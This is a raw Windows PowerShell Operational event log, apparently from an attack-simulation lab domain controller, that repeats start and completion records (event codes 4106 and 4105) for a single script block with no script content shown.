TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472269
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472268
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472267
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472266
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472265
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472264
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472263
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472262
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472261
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472260
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472259
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472258
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472257
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472256
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472255
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472254
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472253
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472252
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472251
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472250
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472249
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472248
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472247
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472246
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472245
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472244
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472243
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472242
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472241
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472240
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472239
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472238
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472237
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472236
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472235
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472234
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472233
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472232
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472231
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472230
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472229
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472228
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472227
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472226
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472225
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472224
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472223
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472222
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472221
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472220
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472219
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472218
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472217
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472216
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472215
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
